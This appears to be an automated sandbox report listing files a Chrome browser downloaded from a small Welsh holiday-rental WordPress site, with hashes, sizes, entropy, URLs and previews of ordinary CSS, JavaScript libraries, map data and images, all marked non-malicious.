              SHA-512:7A15B8D2D0073203398F18BF97507F619588FB338E7F2D8A3BFE8392A4323A74EFA14A87C57573186B55CECFE1CCCFE54127159978711C016D5D9BAE769D1B82
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/owl.css?ver=1726496070
              Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */./*. * Owl Carousel - Core. */..owl-carousel {. display: none;. width: 100%;. -webkit-tap-highlight-color: transparent;. /* position relative and z-index fix webkit rendering fonts issue */. position: relative;. z-index: 1; }. .owl-carousel .owl-stage {. position: relative;. -ms-touch-action: pan-Y;. touch-action: manipulation;. -moz-backface-visibility: hidden;. /* fix firefox animation glitch */ }. .owl-carousel .owl-stage:after {. content: ".";. display: block;. clear: both;. visibility: hidden;. line-height: 0;. height: 0; }. .owl-carousel .owl-stage-outer {. position: relative;. overflow: hidden;. /* fix for flashing background */. -webkit-transform: translate3d(0px, 0px, 0px); }. .owl-carousel .owl-wrapper,. .owl-carousel .owl-item {. -webkit-backface-visibi
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (57791), with CRLF line terminators
              Category:downloaded
              Size (bytes):58078
              Entropy (8bit):5.248934854412323
              Encrypted:false
              SSDEEP:
              MD5:0A958254DB529F99F475080FE2A6DCDB
              SHA1:EEBC17246F2BEDA813DD3372593CC54A152F9CB4
              SHA-256:3BCD802E9F77849E7C1E93C87279FBBB04D45949D2BE79B03566CEACDE29B158
              SHA-512:327BF409CDD167171A300EF7F95FAC5CBC802320B2872EA845EC434FF7987A21CB0F0346A8EB3CB891447B98E2E622C3D721BC295BF4F26E763659DBB8A09940
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/js/bootstrap.min.js?ver=1726496070
              Preview:/*!.. * Bootstrap v4.3.1 (https://getbootstrap.com/).. * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors).. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(this,function(t,g,u){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(o){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},e=Object.keys(r);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(r).filter(function(t){return Object.getOwnPropertyDescr
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):6582
              Entropy (8bit):4.932745627732391
              Encrypted:false
              SSDEEP:
              MD5:EC204CE415D4F8DCA3E57A557BA2E5D7
              SHA1:A96D00116DA3CC0ED5E50D5EEE3B72A554D98703
              SHA-256:9EAF596C9FE778FA687E0018BD32A4EADC3A39448381C3D503064FAD9B692EA7
              SHA-512:8E8BFEFE27330B5D6824E825EB0FB2078EDA015DCA4C3AC5A34C598A0046DFDD98CCF3C971AF168092E2BAF7FF79AE202294CD1BD56A176DE2479EC03A2E8B30
              Malicious:false
              Reputation:unknown
              Preview:[{"id":"twvwvvuvuwwww","zrange":[13,13],"layer":"spotlit"},{"id":"twvwvvuvuwwww","zrange":[13,13],"layer":"m@710461709"},{"id":"twvwvvuvwuuuu","zrange":[13,13],"layer":"spotlit"},{"id":"twvwvvuvwuuuu","zrange":[13,13],"layer":"m@710461709"},{"id":"twvwvvuvwuuuw","zrange":[13,13],"layer":"spotlit"},{"id":"twvwvvuvwuuuw","base":[1053149184,696271872],"zrange":[13,13],"layer":"m@710461709","features":[{"id":"12496879661388740639","a":[0,0,1053149184,696271872,1053149184,696271872],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,10,-29,127,-11],"c":"{\"1\":{\"title\":\"Lyons Robin Hood Holiday Park\"}}","io":[0,-13]},{"id":"3912223937329343958","a":[233472,-101376],"bb":[-124,-29,-10,-11,-96,-15,-9,3],"c":"{\"1\":{\"title\":\"Lyons Lido Beach Caravan Park\"}}"}]},{"id":"twvwvvuvwuuwu","zrange":[13,13],"layer":"spotlit"},{"id":"twvwvvuvwuuwu","base":[1053417472,696121344],"zrange":[13,13],"layer":"m@710461709","features":[{"id":"0x48652a0edff88b63:0x752d23a14c4a052a","a":[0,0,1053417472,696121
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (32009)
              Category:dropped
              Size (bytes):40547
              Entropy (8bit):5.424067186978579
              Encrypted:false
              SSDEEP:
              MD5:71951B246C4726520DCE912A5AC7F03C
              SHA1:56906B9B9F41DF67063091B7A66C8584D87D748F
              SHA-256:DD3BDA90C210C66FD618BB0C35F4B21F871CE1DAE7396053CB4B3A90B3EC51B0
              SHA-512:FF0B38E4E02096DEDCC6FB1A0899A7F8924A89E9B25BB8D712F5FFB01414641B009DA55C45241DDEA6440EECB7EBFF11EA93318AEA46FF3FF71A2E22670CB48D
              Malicious:false
              Reputation:unknown
              Preview:/* == jquery mousewheel plugin == Version: 3.1.12, License: MIT License (MIT) */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):"object"==typeof exports?module.exports=a:a(jQuery)}(function(a){function b(b){var g=b||window.event,h=i.call(arguments,1),j=0,l=0,m=0,n=0,o=0,p=0;if(b=a.event.fix(g),b.type="mousewheel","detail"in g&&(m=-1*g.detail),"wheelDelta"in g&&(m=g.wheelDelta),"wheelDeltaY"in g&&(m=g.wheelDeltaY),"wheelDeltaX"in g&&(l=-1*g.wheelDeltaX),"axis"in g&&g.axis===g.HORIZONTAL_AXIS&&(l=-1*m,m=0),j=0===m?l:m,"deltaY"in g&&(m=-1*g.deltaY,j=m),"deltaX"in g&&(l=g.deltaX,0===m&&(j=-1*l)),0!==m||0!==l){if(1===g.deltaMode){var q=a.data(this,"mousewheel-line-height");j*=q,m*=q,l*=q}else if(2===g.deltaMode){var r=a.data(this,"mousewheel-page-height");j*=r,m*=r,l*=r}if(n=Math.max(Math.abs(m),Math.abs(l)),(!f||f>n)&&(f=n,d(g,n)&&(f/=40)),d(g,n)&&(j/=40,l/=40,m/=40),j=Math[j>=1?"floor":"ceil"](j/f),l=Math[l>=1?"floor":"ceil"](l/f),m=Math[m>=1?"floor":"ceil"](m/f),
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (25839), with no line terminators
              Category:downloaded
              Size (bytes):25839
              Entropy (8bit):5.268911157172394
              Encrypted:false
              SSDEEP:
              MD5:AE5CF8DF244BADF6DCA1734E9FB7F8E4
              SHA1:16A2267441F9A8A4DAB03E34E85E0D9828EC725F
              SHA-256:E6F790B916D66840AE631C1AA7F20E13F0C0C0DC609B88A45FB9EB82CA98A7CF
              SHA-512:347ADE752861D8AE1B00CE348621C818F133856183F66714C1B02DDD0FED8479A2A8921ED1E4D575A4DBE146A3E5D6EB21326B6D1727422B5CE5F642BEBE59F1
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/css/admin/main.min.css?ver=6.6.2
              Preview:.fc-icon,.fc-unselectable{-moz-user-select:none;-ms-user-select:none}.fc .fc-button,.fc-icon{text-transform:none;font-weight:400}.fc-not-allowed,.fc-not-allowed .fc-event{cursor:not-allowed}.fc .fc-button:not(:disabled),.fc a[data-navlink],.fc-event.fc-event-draggable,.fc-event[href]{cursor:pointer}.fc-unselectable{-webkit-user-select:none;user-select:none;-webkit-touch-callout:none;-webkit-tap-highlight-color:transparent}.fc{display:flex;flex-direction:column;font-size:1em}.fc .fc-button,.fc-icon{display:inline-block;text-align:center}.fc,.fc *,.fc :after,.fc :before{box-sizing:border-box}.fc table{border-collapse:collapse;border-spacing:0;font-size:1em}.fc th{text-align:center}.fc td,.fc th{vertical-align:top;padding:0}.fc .fc-button,.fc .fc-button .fc-icon,.fc .fc-button-group,.fc .fc-timegrid-slot-label{vertical-align:middle}.fc a[data-navlink]:hover{text-decoration:underline}.fc .fc-button:hover,.fc .fc-list-event-title a,a.fc-event,a.fc-event:hover{text-decoration:none}.fc-direct
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:assembler source, ASCII text
              Category:downloaded
              Size (bytes):25599
              Entropy (8bit):4.923587865821567
              Encrypted:false
              SSDEEP:
              MD5:F9A623C91166E3C492E3B9D0E7B8ED8B
              SHA1:DF4F69F026422414E92ADBBFACF67F5B2601EC3E
              SHA-256:033DD890970BF94BA635A40990F3174CC2CD6A8E5D3031036496D804D647EC70
              SHA-512:6A71F6BE10E65D4A877293369EA86A98CC77C1B9730C66C15D31D2E066649C4830E455EAE5369177B326995EF4D3B154FB6B92AA8B01B5336E3E9294BEC5E2A1
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/responsive.css?ver=1726496070
              Preview:@media only screen and (max-width: 7000px){...page-wrapper{...overflow: hidden;..}...header-style-one .header-upper{.../*border-bottom: 1px solid rgba(0,0,0,0.2);*/..}...}..@media only screen and (max-width: 1650px){...header-style-one .header-upper{...padding: 0px 20px;..}....facts-section .left-bottom-image{...bottom: -140px;...left: 70px;..}....facts-section .left-bottom-image img{...height: 400px;..}.}..@media only screen and (max-width: 1499px){...fixed-header.header-style-one.alternate-two .header-upper,...header-style-one.alternate-two .header-upper{...top: 0;...background: #ffffff;..}....header-style-one.alternate-two .header-upper .inner-container{...padding-left: 0;...padding-right: 0;..}.}..@media only screen and (max-width: 1340px){...header-style-one .other-links .info{...display: none;..}...main-menu .navigation > li{...margin-right: 30px;..}...h1,...video-section h1,...banner-five .banner-carousel .content-box h1,...page-banner h1{...font-size: 48px;..}...h2,...sec-title
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:downloaded
              Size (bytes):105876
              Entropy (8bit):5.422273442754484
              Encrypted:false
              SSDEEP:
              MD5:50AC2760F8E482EEA2F599964A798931
              SHA1:1FBA58BEFC2EC6CE2CD3743581E44695F2FBE5D7
              SHA-256:FD7DD7D3A368FBBF9C7763F814F3088E35C5C3A4F7AAB37F5E70A211C654353F
              SHA-512:667AEB95B144B81B3290255C657050D3C996A22AEE2E2215BDDD3669D881112593E8D58552022CDAD4682DB54CB8A0E315D1E8D8196D89265C8B5A4E13643C23
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/foobox-image-lightbox/free/js/foobox.free.min.js?ver=2.7.32
              Preview:!function(a,r){var e;a&&r&&(r.FooBox={},FooBox.$=a,FooBox.version="2.4.7",FooBox.defaults={affiliate:{enabled:!(FooBox.instances=[]),prefix:"Powered by ",url:"http://fooplugins.com/plugins/foobox/"},alwaysInit:!0,closeOnOverlayClick:!0,containerCssClass:"fbx-instance",countMessage:"item %index of %total",error:"Could not load the item",excludes:".fbx-link, .nofoobox",externalSelector:"a[data-foobox],input[data-foobox]",fitToScreen:!1,hideScrollbars:!0,loadDelay:0,loaderTimeout:600,modalClass:"",preload:!1,rel:null,resizeSpeed:300,selector:"a",showButtons:!0,showCount:!0,style:"fbx-rounded",theme:"fbx-light",transitionInSpeed:200,transitionOutSpeed:200,initCallback:null,loop:!0},FooBox.isjQuery=function(e){return e instanceof jQuery||e&&e.jquery},FooBox.isFn=function(e){return e===r.alert||"[object Function]"===Object.prototype.toString.call(e)},FooBox.isArray=function(e){return"[object Array]"===Object.prototype.toString.call(e)},FooBox.inArray=function(e,o){return FooBox.isArray(o)?o.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (12198), with no line terminators
              Category:downloaded
              Size (bytes):12198
              Entropy (8bit):5.031745242580206
              Encrypted:false
              SSDEEP:
              MD5:3819C3569DA71DAEC283A75483735F7E
              SHA1:ECD40A5CC6F0B76200C454CA880210DC301CFAB8
              SHA-256:214674CC77ABA35AB3567B88E2739FD08E8E96C61D279559AD61874069683EA0
              SHA-512:2710655DFF46653DAEB3A6E3F6D36F885E51D5B375738EE353ACA40C6F66AE1A7DECE57039D58747012ED9EA2822191143C06F270123B8CC580F6A41B8E8AEF4
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
              Preview:!function(){"use strict";function Waypoint(options){if(!options)throw new Error("No options passed to Waypoint constructor");if(!options.element)throw new Error("No element option passed to Waypoint constructor");if(!options.handler)throw new Error("No handler option passed to Waypoint constructor");this.key="waypoint-"+keyCounter,this.options=Waypoint.Adapter.extend({},Waypoint.defaults,options),this.element=this.options.element,this.adapter=new Waypoint.Adapter(this.element),this.callback=options.handler,this.axis=this.options.horizontal?"horizontal":"vertical",this.enabled=this.options.enabled,this.triggerPoint=null,this.group=Waypoint.Group.findOrCreate({name:this.options.group,axis:this.axis}),this.context=Waypoint.Context.findOrCreateByElement(this.options.context),Waypoint.offsetAliases[this.options.offset]&&(this.options.offset=Waypoint.offsetAliases[this.options.offset]),this.group.add(this),this.context.add(this),allWaypoints[this.key]=this,keyCounter+=1}var keyCounter=0,allW
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (10729)
              Category:downloaded
              Size (bytes):11882
              Entropy (8bit):5.935269128638304
              Encrypted:false
              SSDEEP:
              MD5:1E874B6E46A570D0C633ED03308279E2
              SHA1:7A030F95B30FEF41E67E37908C3ACEAE469BB8AC
              SHA-256:861D63EFA1CA29E3F2A39BC136D231075320CC5100F9C6B7A5A2C7A135C4BFD9
              SHA-512:92696A22991CFFBA233FEE34AAF35DE0BBFB54484C8B7D241E5DBEC71F7CADBFCE6DE72F08533CAF28A5A41F5CFEF99D6C11FECF8D6531070D04B4F3CC017A4A
              Malicious:false
              Reputation:unknown
              URL:"https://maps.googleapis.com/maps/api/js?client=google-maps-embed&paint_origin=&libraries=geometry,search&v=weekly&loading=async&language=en&region=uk&callback=onApiLoad"
              Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. var rules = {. createHTML: function(src) {. return src;. },. createScriptURL: function(src) {. return src;. }. };. var ttPolicy;. . try {. ttPolicy = window.trustedTypes.createPolicy('google-maps-api-loader', rules);. } catch(e) {. ttPolicy = rules;. }. . function getScript(src) {. var a, nonce = ((a = document.querySelector("script[nonce]")) == null ? void 0 : a.nonce) || "";. var s = document.createElement('script');. . s.src = ttPolicy.createScriptURL(src);. s.nonce = nonce;. document.head.appendChild(s);. }. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=989\u0026hl=en\u0026gl=GB\u0026","https://khms1.googleapis.com/k
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x2048, components 3
              Category:downloaded
              Size (bytes):461582
              Entropy (8bit):7.937194678321253
              Encrypted:false
              SSDEEP:
              MD5:425C29D6ABFA0991B8142BC6D91BC746
              SHA1:67A4F00A28BD1FAB0AF4BE1A9C5599346DAF26B6
              SHA-256:FBFEFF7BBFF00F53490BE2C42AD645B098FEA1644568872BDAED5D94077B5DDB
              SHA-512:1C5BE41DE5E0417390C4676FEBBC9545AC195830BB6F9D71BBCC8A73E8E7EC35408C0D57CE7AE39D68883237A4A3F8D6192A26337404EA9EFBE0E3C7E8FEE6A5
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2022/01/2021_4_X_0119-scaled.jpg
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...QE........`.....(.... .....sE.X...Z....(.........`%.ii(.QE....3E...!.....Hii....a4.Q.R...cP..cPI.!.n.....Z..k.....e#...UCW....kts.(..........4f...vh........HGze-0$.0.O[....3@&.Kx......E+.I.k~..R..s..#4..K.|..]G.MK..W<..p..CG*.9....S...\..a...Rp.9.&...WQ..r....u.z.f?hu....[.{.&..;...Z^.3.[...o}.MG.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1572)
              Category:downloaded
              Size (bytes):42221
              Entropy (8bit):5.553445191433403
              Encrypted:false
              SSDEEP:
              MD5:D7BAF05C6E14C13A23F448AC65FF9D1F
              SHA1:DBE0994634F05F9E1AD254193AC747A9840FB18C
              SHA-256:8F52BE836A7F2E7003CA45F889E310551763B925DFBE105C3A1E31D18D132958
              SHA-512:9B047545BCE75A7BAB3FF933A6E6F01678039A51E50EFBA97FA5ECA793306003B686C05900C9B95491637F3C63B9D565A8485B5F455A194EF89AEB5F87B9E158
              Malicious:false
              Reputation:unknown
              URL:"https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Google+Sans_old:400,500,700|Google+Sans+Text_old:400,500,700&lang=en"
              Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v60/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* bengali */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v60/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiAUvaYr.woff2) format('woff2');. unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;.}./* cyrillic-ext */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v60/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_I
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (42907), with no line terminators
              Category:downloaded
              Size (bytes):42907
              Entropy (8bit):5.142755225659953
              Encrypted:false
              SSDEEP:
              MD5:48CED4B8591F0E0216BF4A44926CBBB2
              SHA1:ECD34B4C09645B415C5A4535C51E18D008931204
              SHA-256:2CD8D308A8B1AB19DD60121E4BB462C5A217AAB38F28B7C625698939B1902385
              SHA-512:F47852FDCD24874903889A567DE2A26354931D1EC92BEB84B28C81560DFBD5C8D256E0AE7FD168DC197827EC0F72C7B72A3266A69425CE0B2B2334983CBAB609
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/scrollbar.css?ver=1726496070
              Preview:.mCustomScrollbar{-ms-touch-action:none;touch-action:none}.mCustomScrollbar.mCS_no_scrollbar,.mCustomScrollbar.mCS_touch_action{-ms-touch-action:auto;touch-action:auto}.mCustomScrollBox{position:relative;overflow:hidden;height:100%;max-width:100%;outline:0;direction:ltr}.mCSB_container{overflow:hidden;width:auto;height:auto}.mCSB_inside>.mCSB_container{margin-right:30px}.mCSB_container.mCS_no_scrollbar_y.mCS_y_hidden{margin-right:0}.mCS-dir-rtl>.mCSB_inside>.mCSB_container{margin-right:0;margin-left:30px}.mCS-dir-rtl>.mCSB_inside>.mCSB_container.mCS_no_scrollbar_y.mCS_y_hidden{margin-left:0}.mCSB_scrollTools{position:absolute;width:16px;height:auto;left:auto;top:0;right:0;bottom:0;opacity:.75;filter:"alpha(opacity=75)";-ms-filter:"alpha(opacity=75)"}.mCSB_outside+.mCSB_scrollTools{right:-26px}.mCS-dir-rtl>.mCSB_inside>.mCSB_scrollTools,.mCS-dir-rtl>.mCSB_outside+.mCSB_scrollTools{right:auto;left:0}.mCS-dir-rtl>.mCSB_outside+.mCSB_scrollTools{left:-26px}.mCSB_scrollTools .mCSB_draggerCo
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):11990
              Entropy (8bit):7.97996576873241
              Encrypted:false
              SSDEEP:
              MD5:0354EF777673F096CCC3CE9A6E64FE7C
              SHA1:418AE3CF1E9CF8CFAFAF895CD0113CEF3CAD85FD
              SHA-256:ED98F58C69BA387389C5704E12AFDA62B23AFC6DD6F2BCC3760B37EACCDBE015
              SHA-512:1D4BE865BDF203E6884F40AD6E9B407A84D00B29E62DFBDBBB4392A34D66C9ADA1B7AA4C878964DC1850E451E61AED74F57900AD65345A01C50BAC26EAD3BDCB
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4018!3i2655!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=56105
              Preview:RIFF....WEBPVP8L..../..?.W.6.mU.....2"B..Q..........H.U......G........u..8.mU..nY...dA.....9..23f........B.<.b..!.{.H"..H.!..'.q...,.......,..R...g..+{9..2.O.....a..^L)}.*...)E%..=TI...9....d.{..-...s..Kgl"...F#dB.Cl"....9.U$Lw.C....r.T.O.n..+.VZ.O..Y.....1..&.5..M.k....k.B....pB6@........V...x...7.....\...T..sx.Mr......6......x6'.2F.1.c..)..AF.7.;3.|..+.z..$...S...D..m.tt.H).G.....>.................x........."....o.z......."..|.p...47....)M_#....Kw.1....._....7......-^.W.....?..V....}E........Tw.... d>..[..1.uE7....Ia..9.I_Y..!.. "j.!D..>#J.. .r%. ..E{S...k....!".(>....b1ol.s%%..#r.9%.g..6 z...^....;..Q......y`.'...0..-../..J.>J....^?.M....e..^.......Uk.A.e...~.v<"z.oD.........}..T.o.....G."..hc..sJ.p...?.PJ....|w../.A^.......D..u....Y.Cs0.<....[....!.qy.{/...#g+.c.....}.'.\.>.G.h.T.i{?..@....|B.........@..:.../J.....*D(....U...q.....;.|K..G.>..O...{..x...k...5..^[".....{.....:.|..m...?..[oG7........NH..`...e.......}..].....?.SH>@%.5.@D...D.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (4220), with no line terminators
              Category:downloaded
              Size (bytes):4220
              Entropy (8bit):5.070254021234818
              Encrypted:false
              SSDEEP:
              MD5:9C515DC535774A0419AFAAB68E10AFE9
              SHA1:33AAD322DDCF94D0EA07B56B18DB27A8EF25FFFF
              SHA-256:9DC9155CFD6331D1F5629881AC0BC63928243FA4C1D83B17CE4921B5200BE0AE
              SHA-512:AAF78A9C6AEF38285B4B301DB52B3CA7AF5EA0B7A0CA1FB587038C6E6A425622308FBAE7E2826376632F58EBB24254CE6604E5640D0DD8F5C0EE203CFF64D460
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/lib/slider/nouislider.min.css?ver=6.6.2
              Preview:.noUi-target,.noUi-target *{-webkit-touch-callout:none;-webkit-tap-highlight-color:transparent;-webkit-user-select:none;-ms-touch-action:none;touch-action:none;-ms-user-select:none;-moz-user-select:none;user-select:none;-moz-box-sizing:border-box;box-sizing:border-box}.noUi-target{position:relative}.noUi-base,.noUi-connects{width:100%;height:100%;position:relative;z-index:1}.noUi-connects{overflow:hidden;z-index:0}.noUi-connect,.noUi-origin{will-change:transform;position:absolute;z-index:1;top:0;right:0;height:100%;width:100%;-ms-transform-origin:0 0;-webkit-transform-origin:0 0;-webkit-transform-style:preserve-3d;transform-origin:0 0;transform-style:flat}.noUi-txt-dir-rtl.noUi-horizontal .noUi-origin{left:0;right:auto}.noUi-vertical .noUi-origin{top:-100%;width:0}.noUi-horizontal .noUi-origin{height:0}.noUi-handle{-webkit-backface-visibility:hidden;backface-visibility:hidden;position:absolute}.noUi-touch-area{height:100%;width:100%}.noUi-state-tap .noUi-connect,.noUi-state-tap .noUi-o
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):5992
              Entropy (8bit):4.991193231235999
              Encrypted:false
              SSDEEP:
              MD5:D7A3A71672A700B6D687DE61801CD9BB
              SHA1:6AA55774DDC17C209EC73C0F8EED3D548298E8CF
              SHA-256:2C11C4713E10A037439F03A0FB8E1DAA150AD472519C12EAD5B9B624041EE994
              SHA-512:A78A1956C4265F5D168E73D121A736B313E53FCA4ECF27BABA18142881952F871CDA75B0C2AA4E91888F85F8C054FB4E2A831FB7BAEFA363FD541F34F8ABF9D2
              Malicious:false
              Reputation:unknown
              Preview:[{"id":"twvwvvuwvtttw","zrange":[13,13],"layer":"spotlit"},{"id":"twvwvvuwvtttw","base":[1053051904,696535040],"zrange":[13,13],"layer":"m@710461709","features":[{"id":"11379305482513277782","a":[0,0,1053051904,696535040,1053051904,696535040],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-85,-22,-10,-4],"c":"{\"1\":{\"title\":\"Sainsbury's\"}}","io":[0,-13]},{"id":"8044265809627751359","a":[68608,74752,1053120512,696609792,1053120512,696609792],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-134,-22,-10,-4],"c":"{\"1\":{\"title\":\"Rhuddlan Golf Club\"}}","io":[0,-13]}]},{"id":"twvwvvuwvttut","zrange":[13,13],"layer":"spotlit"},{"id":"twvwvvuwvttut","base":[1052879872,696843264],"zrange":[13,13],"layer":"m@710461709","features":[{"id":"3623702776943734458","a":[0,0,1052879872,696843264,1052879872,696843264],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-139,-22,-10,-4],"c":"{\"1\":{\"title\":\"Glan Clwyd Hospital\"}}","io":[0,-13]},{"id":"9023657737844357996","a":[-29696,111616,1052850176,
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (15752)
              Category:downloaded
              Size (bytes):18726
              Entropy (8bit):4.756109283632968
              Encrypted:false
              SSDEEP:
              MD5:B976B651932BFD25B9DDB5B7693D88A7
              SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
              SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
              SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-includes/js/wp-emoji-release.min.js?ver=6.6.2
              Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):4658
              Entropy (8bit):7.947000399072969
              Encrypted:false
              SSDEEP:
              MD5:B15546C0B974B541D6CC15E78EEC0BBA
              SHA1:6C36031839A525D684ADAA757F948E60F4CEB196
              SHA-256:613C777147B30D257A3AB1DBF039A346875AD0FFE612C2E30FD5FA8032B2DB14
